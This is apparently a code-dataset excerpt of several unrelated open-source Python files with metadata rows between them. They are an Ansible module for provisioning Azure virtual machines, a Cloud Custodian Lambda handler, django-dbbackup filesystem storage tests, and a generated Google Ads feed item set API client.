required: false
default: null
hostname:
description:
- hostname to write /etc/hostname. Defaults to <name>.cloudapp.net.
required: false
default: null
wait:
description:
- wait for the instance to be in state 'running' before returning
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 600
aliases: []
wait_timeout_redirects:
description:
- how long before wait gives up for redirects, in seconds
default: 300
aliases: []
state:
description:
- create or terminate instances
required: false
default: 'present'
aliases: []
auto_updates:
description:
- Enable Auto Updates on Windows Machines
required: false
version_added: "2.0"
default: "no"
choices: [ "yes", "no" ]
enable_winrm:
description:
- Enable winrm on Windows Machines
required: false
version_added: "2.0"
default: "yes"
choices: [ "yes", "no" ]
os_type:
description:
- The type of the os that is gettings provisioned
required: false
version_added: "2.0"
default: "linux"
choices: [ "windows", "linux" ]
requirements:
- "python >= 2.6"
- "azure >= 0.7.1"
author: "John Whitbeck (@jwhitbeck)"
'''
EXAMPLES = '''
# Note: None of these examples set subscription_id or management_cert_path
# It is assumed that their matching environment variables are set.
# Provision virtual machine example
- local_action:
module: azure
name: my-virtual-machine
role_size: Small
image: b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu_DAILY_BUILD-precise-12_04_3-LTS-amd64-server-20131205-en-us-30GB
location: 'East US'
user: ubuntu
ssh_cert_path: /path/to/azure_x509_cert.pem
storage_account: my-storage-account
wait: yes
# Terminate virtual machine example
- local_action:
module: azure
name: my-virtual-machine
state: absent
#Create windows machine
- hosts: all
connection: local
tasks:
- local_action:
module: azure
name: "ben-Winows-23"
hostname: "win123"
os_type: windows
enable_winrm: yes
subscription_id: "{{ azure_sub_id }}"
management_cert_path: "{{ azure_cert_path }}"
role_size: Small
image: 'bd507d3a70934695bc2128e3e5a255ba__RightImage-Windows-2012-x64-v13.5'
location: 'East Asia'
password: "xxx"
storage_account: benooytes
user: admin
wait: yes
virtual_network_name: "{{ vnet_name }}"
'''
import base64
import datetime
import os
import time
from urlparse import urlparse
from ansible.module_utils.facts import * # TimeoutError
AZURE_LOCATIONS = ['South Central US',
'Central US',
'East US 2',
'East US',
'West US',
'North Central US',
'North Europe',
'West Europe',
'East Asia',
'Southeast Asia',
'Japan West',
'Japan East',
'Brazil South']
AZURE_ROLE_SIZES = ['ExtraSmall',
'Small',
'Medium',
'Large',
'ExtraLarge',
'A5',
'A6',
'A7',
'A8',
'A9',
'Basic_A0',
'Basic_A1',
'Basic_A2',
'Basic_A3',
'Basic_A4',
'Standard_D1',
'Standard_D2',
'Standard_D3',
'Standard_D4',
'Standard_D11',
'Standard_D12',
'Standard_D13',
'Standard_D14',
'Standard_DS1',
'Standard_DS2',
'Standard_DS3',
'Standard_DS4',
'Standard_DS11',
'Standard_DS12',
'Standard_DS13',
'Standard_DS14',
'Standard_G1',
'Standard_G2',
'Standard_G3',
'Standard_G4',
'Standard_G5']
from distutils.version import LooseVersion
try:
import azure as windows_azure
if hasattr(windows_azure, '__version__') and LooseVersion(windows_azure.__version__) <= "0.11.1":
from azure import WindowsAzureError as AzureException
from azure import WindowsAzureMissingResourceError as AzureMissingException
else:
from azure.common import AzureException as AzureException
from azure.common import AzureMissingResourceHttpError as AzureMissingException
from azure.servicemanagement import (ServiceManagementService, OSVirtualHardDisk, SSH, PublicKeys,
PublicKey, LinuxConfigurationSet, ConfigurationSetInputEndpoints,
ConfigurationSetInputEndpoint, Listener, WindowsConfigurationSet)
HAS_AZURE = True
except ImportError:
HAS_AZURE = False
from types import MethodType
import json
def _wait_for_completion(azure, promise, wait_timeout, msg):
if not promise: return
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time():
operation_result = azure.get_operation_status(promise.request_id)
time.sleep(5)
if operation_result.status == "Succeeded":
return
raise AzureException('Timed out waiting for async operation ' + msg + ' "' + str(promise.request_id) + '" to complete.')
def _delete_disks_when_detached(azure, wait_timeout, disk_names):
def _handle_timeout(signum, frame):
raise TimeoutError("Timeout reached while waiting for disks to become detached.")
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(wait_timeout)
try:
while len(disk_names) > 0:
for disk_name in disk_names:
disk = azure.get_disk(disk_name)
if disk.attached_to is None:
azure.delete_disk(disk.name, True)
disk_names.remove(disk_name)
except AzureException, e:
module.fail_json(msg="failed to get or delete disk, error was: %s" % (disk_name, str(e)))
finally:
signal.alarm(0)
def get_ssh_certificate_tokens(module, ssh_cert_path):
"""
Returns the sha1 fingerprint and a base64-encoded PKCS12 version of the certificate.
"""
# This returns a string such as SHA1 Fingerprint=88:60:0B:13:A9:14:47:DA:4E:19:10:7D:34:92:2B:DF:A1:7D:CA:FF
rc, stdout, stderr = module.run_command(['openssl', 'x509', '-in', ssh_cert_path, '-fingerprint', '-noout'])
if rc != 0:
module.fail_json(msg="failed to generate the key fingerprint, error was: %s" % stderr)
fingerprint = stdout.strip()[17:].replace(':', '')
rc, stdout, stderr = module.run_command(['openssl', 'pkcs12', '-export', '-in', ssh_cert_path, '-nokeys', '-password', 'pass:'])
if rc != 0:
module.fail_json(msg="failed to generate the pkcs12 signature from the certificate, error was: %s" % stderr)
pkcs12_base64 = base64.b64encode(stdout.strip())
return (fingerprint, pkcs12_base64)
def create_virtual_machine(module, azure):
"""
Create new virtual machine
module : AnsibleModule object
azure: authenticated azure ServiceManagementService object
Returns:
True if a new virtual machine and/or cloud service was created, false otherwise
"""
name = module.params.get('name')
os_type = module.params.get('os_type')
hostname = module.params.get('hostname') or name + ".cloudapp.net"
endpoints = module.params.get('endpoints').split(',')
ssh_cert_path = module.params.get('ssh_cert_path')
user = module.params.get('user')
password = module.params.get('password')
location = module.params.get('location')
role_size = module.params.get('role_size')
storage_account = module.params.get('storage_account')
image = module.params.get('image')
virtual_network_name = module.params.get('virtual_network_name')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
# Check if a deployment with the same name already exists
cloud_service_name_available = azure.check_hosted_service_name_availability(name)
if cloud_service_name_available.result:
# cloud service does not exist; create it
try:
result = azure.create_hosted_service(service_name=name, label=name, location=location)
_wait_for_completion(azure, result, wait_timeout, "create_hosted_service")
changed = True
except AzureException, e:
module.fail_json(msg="failed to create the new service, error was: %s" % str(e))
try:
# check to see if a vm with this name exists; if so, do nothing
azure.get_role(name, name, name)
except AzureMissingException:
# vm does not exist; create it
if os_type == 'linux':
# Create linux configuration
disable_ssh_password_authentication = not password
vm_config = LinuxConfigurationSet(hostname, user, password, disable_ssh_password_authentication)
else:
#Create Windows Config
vm_config = WindowsConfigurationSet(hostname, password, None, module.params.get('auto_updates'), None, user)
vm_config.domain_join = None
if module.params.get('enable_winrm'):
listener = Listener('Http')
vm_config.win_rm.listeners.listeners.append(listener)
else:
vm_config.win_rm = None
# Add ssh certificates if specified
if ssh_cert_path:
fingerprint, pkcs12_base64 = get_ssh_certificate_tokens(module, ssh_cert_path)
# Add certificate to cloud service
result = azure.add_service_certificate(name, pkcs12_base64, 'pfx', '')
_wait_for_completion(azure, result, wait_timeout, "add_service_certificate")
# Create ssh config
ssh_config = SSH()
ssh_config.public_keys = PublicKeys()
authorized_keys_path = u'/home/%s/.ssh/authorized_keys' % user
ssh_config.public_keys.public_keys.append(PublicKey(path=authorized_keys_path, fingerprint=fingerprint))
# Append ssh config to linux machine config
vm_config.ssh = ssh_config
# Create network configuration
network_config = ConfigurationSetInputEndpoints()
network_config.configuration_set_type = 'NetworkConfiguration'
network_config.subnet_names = []
network_config.public_ips = None
for port in endpoints:
network_config.input_endpoints.append(ConfigurationSetInputEndpoint(name='TCP-%s' % port,
protocol='TCP',
port=port,
local_port=port))
# First determine where to store disk
today = datetime.date.today().strftime('%Y-%m-%d')
disk_prefix = u'%s-%s' % (name, name)
media_link = u'http://%s.blob.core.windows.net/vhds/%s-%s.vhd' % (storage_account, disk_prefix, today)
# Create system hard disk
os_hd = OSVirtualHardDisk(image, media_link)
# Spin up virtual machine
try:
result = azure.create_virtual_machine_deployment(service_name=name,
deployment_name=name,
deployment_slot='production',
label=name,
role_name=name,
system_config=vm_config,
network_config=network_config,
os_virtual_hard_disk=os_hd,
role_size=role_size,
role_type='PersistentVMRole',
virtual_network_name=virtual_network_name)
_wait_for_completion(azure, result, wait_timeout, "create_virtual_machine_deployment")
changed = True
except AzureException, e:
module.fail_json(msg="failed to create the new virtual machine, error was: %s" % str(e))
try:
deployment = azure.get_deployment_by_name(service_name=name, deployment_name=name)
return (changed, urlparse(deployment.url).hostname, deployment)
except AzureException, e:
module.fail_json(msg="failed to lookup the deployment information for %s, error was: %s" % (name, str(e)))
def terminate_virtual_machine(module, azure):
"""
Terminates a virtual machine
module : AnsibleModule object
azure: authenticated azure ServiceManagementService object
Returns:
True if a new virtual machine was deleted, false otherwise
"""
# Whether to wait for termination to complete before returning
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
name = module.params.get('name')
delete_empty_services = module.params.get('delete_empty_services')
changed = False
deployment = None
public_dns_name = None
disk_names = []
try:
deployment = azure.get_deployment_by_name(service_name=name, deployment_name=name)
except AzureMissingException, e:
pass # no such deployment or service
except AzureException, e:
module.fail_json(msg="failed to find the deployment, error was: %s" % str(e))
# Delete deployment
if deployment:
changed = True
try:
# gather disk info
results = []
for role in deployment.role_list:
role_props = azure.get_role(name, deployment.name, role.role_name)
if role_props.os_virtual_hard_disk.disk_name not in disk_names:
disk_names.append(role_props.os_virtual_hard_disk.disk_name)
except AzureException, e:
module.fail_json(msg="failed to get the role %s, error was: %s" % (role.role_name, str(e)))
try:
result = azure.delete_deployment(name, deployment.name)
_wait_for_completion(azure, result, wait_timeout, "delete_deployment")
except AzureException, e:
module.fail_json(msg="failed to delete the deployment %s, error was: %s" % (deployment.name, str(e)))
# It's unclear when disks associated with terminated deployment get detatched.
# Thus, until the wait_timeout is reached, we continue to delete disks as they
# become detatched by polling the list of remaining disks and examining the state.
try:
_delete_disks_when_detached(azure, wait_timeout, disk_names)
except (AzureException, TimeoutError), e:
module.fail_json(msg=str(e))
try:
# Now that the vm is deleted, remove the cloud service
result = azure.delete_hosted_service(service_name=name)
_wait_for_completion(azure, result, wait_timeout, "delete_hosted_service")
except AzureException, e:
module.fail_json(msg="failed to delete the service %s, error was: %s" % (name, str(e)))
public_dns_name = urlparse(deployment.url).hostname
return changed, public_dns_name, deployment
def get_azure_creds(module):
# Check module args for credentials, then check environment vars
subscription_id = module.params.get('subscription_id')
if not subscription_id:
subscription_id = os.environ.get('AZURE_SUBSCRIPTION_ID', None)
if not subscription_id:
module.fail_json(msg="No subscription_id provided. Please set 'AZURE_SUBSCRIPTION_ID' or use the 'subscription_id' parameter")
management_cert_path = module.params.get('management_cert_path')
if not management_cert_path:
management_cert_path = os.environ.get('AZURE_CERT_PATH', None)
if not management_cert_path:
module.fail_json(msg="No management_cert_path provided. Please set 'AZURE_CERT_PATH' or use the 'management_cert_path' parameter")
return subscription_id, management_cert_path
def main():
module = AnsibleModule(
argument_spec=dict(
ssh_cert_path=dict(),
name=dict(),
hostname=dict(),
os_type=dict(default='linux', choices=['linux', 'windows']),
location=dict(choices=AZURE_LOCATIONS),
role_size=dict(choices=AZURE_ROLE_SIZES),
subscription_id=dict(no_log=True),
storage_account=dict(),
management_cert_path=dict(),
endpoints=dict(default='22'),
user=dict(),
password=dict(),
image=dict(),
virtual_network_name=dict(default=None),
state=dict(default='present'),
wait=dict(type='bool', default=False),
wait_timeout=dict(default=600),
wait_timeout_redirects=dict(default=300),
auto_updates=dict(type='bool', default=False),
enable_winrm=dict(type='bool', default=True),
)
)
if not HAS_AZURE:
module.fail_json(msg='azure python module required for this module')
# create azure ServiceManagementService object
subscription_id, management_cert_path = get_azure_creds(module)
wait_timeout_redirects = int(module.params.get('wait_timeout_redirects'))
if hasattr(windows_azure, '__version__') and LooseVersion(windows_azure.__version__) <= "0.8.0":
# wrapper for handling redirects which the sdk <= 0.8.0 is not following
azure = Wrapper(ServiceManagementService(subscription_id, management_cert_path), wait_timeout_redirects)
else:
azure = ServiceManagementService(subscription_id, management_cert_path)
cloud_service_raw = None
if module.params.get('state') == 'absent':
(changed, public_dns_name, deployment) = terminate_virtual_machine(module, azure)
elif module.params.get('state') == 'present':
# Changed is always set to true when provisioning new instances
if not module.params.get('name'):
module.fail_json(msg='name parameter is required for new instance')
if not module.params.get('image'):
module.fail_json(msg='image parameter is required for new instance')
if not module.params.get('user'):
module.fail_json(msg='user parameter is required for new instance')
if not module.params.get('location'):
module.fail_json(msg='location parameter is required for new instance')
if not module.params.get('storage_account'):
module.fail_json(msg='storage_account parameter is required for new instance')
if not (module.params.get('password') or module.params.get('ssh_cert_path')):
module.fail_json(msg='password or ssh_cert_path parameter is required for new instance')
(changed, public_dns_name, deployment) = create_virtual_machine(module, azure)
module.exit_json(changed=changed, public_dns_name=public_dns_name, deployment=json.loads(json.dumps(deployment, default=lambda o: o.__dict__)))
class Wrapper(object):
def __init__(self, obj, wait_timeout):
self.other = obj
self.wait_timeout = wait_timeout
def __getattr__(self, name):
if hasattr(self.other, name):
func = getattr(self.other, name)
return lambda *args, **kwargs: self._wrap(func, args, kwargs)
raise AttributeError(name)
def _wrap(self, func, args, kwargs):
if type(func) == MethodType:
result = self._handle_temporary_redirects(lambda: func(*args, **kwargs))
else:
result = self._handle_temporary_redirects(lambda: func(self.other, *args, **kwargs))
return result
def _handle_temporary_redirects(self, f):
wait_timeout = time.time() + self.wait_timeout
while wait_timeout > time.time():
try:
return f()
except AzureException, e:
if not str(e).lower().find("temporary redirect") == -1:
time.sleep(5)
pass
else:
raise e
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 | -7,997,537,051,547,410,000 | 38.472131 | 289 | 0.609145 | false |
scotwk/cloud-custodian | tools/c7n_sphere11/c7n_sphere11/handler.py | 4 | 1871 | # Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import pprint
import sys
from c7n.utils import format_event
from c7n.resources import load_resources
import app
import wsgigw
logging.root.setLevel(logging.DEBUG)
logging.getLogger('botocore').setLevel(logging.WARNING)
load_resources()
def debug(event, context):
print sys.executable
print sys.version
print sys.path
pprint.pprint(os.environ)
print format_event(event)
def lambda_handler(event, context=None):
# Periodic
if event.get('detail-type') == 'Scheduled Event':
debug(event, context)
return app.on_timer(event)
# SNS / Dynamodb / Kinesis
elif event.get('Records'):
records = event['Records']
if records and records[0]['EventSource'] == 'aws:sns':
return app.on_config_message(records)
else:
return debug(event, context)
elif not event.get('path'):
return debug(event, context)
# API Gateway
if app.config.get('sentry-dsn'):
from raven import Client
from raven.contrib.bottle import Sentry
client = Client(app.config['sentry-dsn'])
app.app.catchall = False
wrapped_app = Sentry(app.app, client)
else:
wrapped_app = app.app
return wsgigw.invoke(wrapped_app, event)
| apache-2.0 | 1,467,757,836,904,320,500 | 26.925373 | 74 | 0.693212 | false |
VerosK/django-dbbackup | dbbackup/tests/storages/test_filesystem.py | 4 | 2548 | import os
import tempfile
import shutil
from io import BytesIO
from mock import patch
from django.test import TestCase
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from dbbackup.storage.filesystem_storage import Storage as FileSystemStorage
class FileSystemStorageTest(TestCase):
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_delete_file(self):
file_path = os.path.join(self.temp_dir, 'foo')
open(file_path, 'w').close()
self.storage.delete_file('foo')
self.assertFalse(os.listdir(self.temp_dir))
def test_list_directory(self):
file_path1 = os.path.join(self.temp_dir, 'foo')
file_path2 = os.path.join(self.temp_dir, 'bar')
self.assertEqual(0, len(os.listdir(self.temp_dir)))
open(file_path1, 'w').close()
self.assertEqual(1, len(os.listdir(self.temp_dir)))
open(file_path2, 'w').close()
self.assertEqual(2, len(os.listdir(self.temp_dir)))
def test_write_file(self):
file_path = os.path.join(self.temp_dir, 'foo')
self.storage.write_file(BytesIO(b'bar'), 'foo')
self.assertTrue(os.path.exists(file_path))
self.assertEqual(open(file_path).read(), 'bar')
def test_read_file(self):
file_path = os.path.join(self.temp_dir, 'foo')
with open(file_path, 'w') as fd:
fd.write('bar')
read_file = self.storage.read_file('foo')
self.assertEqual(read_file.read(), b'bar')
class FileSystemStorageCheckTest(TestCase):
def test_fail_location_is_none(self):
with self.assertRaises(Exception):
self.storage = FileSystemStorage(location=None)
def test_fail_location_is_empty_str(self):
with self.assertRaises(Exception):
self.storage = FileSystemStorage(location='')
def test_fail_no_location(self):
with self.assertRaises(Exception):
self.storage = FileSystemStorage()
def test_fail_backup_in_media_file(self):
with self.assertRaises(ImproperlyConfigured):
self.storage = FileSystemStorage(location=settings.MEDIA_ROOT)
@patch('django.conf.settings.DEBUG', True)
def test_success_backup_in_media_file_debug(self):
self.storage = FileSystemStorage(location=settings.MEDIA_ROOT)
def test_success(self):
self.storage = FileSystemStorage(location='foo')
| bsd-3-clause | -3,269,493,144,050,323,500 | 34.887324 | 76 | 0.666797 | false |
googleapis/googleapis-gen | google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/services/services/feed_item_set_service/client.py | 1 | 22845 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v8.common.types import feed_item_set_filter_type_infos
from google.ads.googleads.v8.enums.types import feed_item_set_status
from google.ads.googleads.v8.resources.types import feed_item_set
from google.ads.googleads.v8.services.types import feed_item_set_service
from .transports.base import FeedItemSetServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import FeedItemSetServiceGrpcTransport
class FeedItemSetServiceClientMeta(type):
"""Metaclass for the FeedItemSetService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[FeedItemSetServiceTransport]]
_transport_registry['grpc'] = FeedItemSetServiceGrpcTransport
def get_transport_class(cls,
label: str = None,
) -> Type[FeedItemSetServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class FeedItemSetServiceClient(metaclass=FeedItemSetServiceClientMeta):
"""Service to manage feed Item Set"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeedItemSetServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeedItemSetServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> FeedItemSetServiceTransport:
"""Return the transport used by the client instance.
Returns:
FeedItemSetServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def feed_path(customer_id: str,feed_id: str,) -> str:
"""Return a fully-qualified feed string."""
return "customers/{customer_id}/feeds/{feed_id}".format(customer_id=customer_id, feed_id=feed_id, )
@staticmethod
def parse_feed_path(path: str) -> Dict[str,str]:
"""Parse a feed path into its component segments."""
m = re.match(r"^customers/(?P<customer_id>.+?)/feeds/(?P<feed_id>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def feed_item_set_path(customer_id: str,feed_id: str,feed_item_set_id: str,) -> str:
"""Return a fully-qualified feed_item_set string."""
return "customers/{customer_id}/feedItemSets/{feed_id}~{feed_item_set_id}".format(customer_id=customer_id, feed_id=feed_id, feed_item_set_id=feed_item_set_id, )
@staticmethod
def parse_feed_item_set_path(path: str) -> Dict[str,str]:
"""Parse a feed_item_set path into its component segments."""
m = re.match(r"^customers/(?P<customer_id>.+?)/feedItemSets/(?P<feed_id>.+?)~(?P<feed_item_set_id>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, FeedItemSetServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the feed item set service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.FeedItemSetServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, FeedItemSetServiceTransport):
# transport is a FeedItemSetServiceTransport instance.
if credentials:
raise ValueError('When providing a transport instance, '
'provide its credentials directly.')
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = FeedItemSetServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_feed_item_set(self,
request: feed_item_set_service.GetFeedItemSetRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> feed_item_set.FeedItemSet:
r"""Returns the requested feed item set in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Args:
request (:class:`google.ads.googleads.v8.services.types.GetFeedItemSetRequest`):
The request object. Request message for
[FeedItemSetService.GetFeedItemSet][google.ads.googleads.v8.services.FeedItemSetService.GetFeedItemSet].
resource_name (:class:`str`):
Required. The resource name of the
feed item set to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.resources.types.FeedItemSet:
Represents a set of feed items. The
set can be used and shared among certain
feed item features. For instance, the
set can be referenced within the
matching functions of CustomerFeed,
CampaignFeed, and AdGroupFeed.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a feed_item_set_service.GetFeedItemSetRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, feed_item_set_service.GetFeedItemSetRequest):
request = feed_item_set_service.GetFeedItemSetRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_feed_item_set]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('resource_name', request.resource_name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
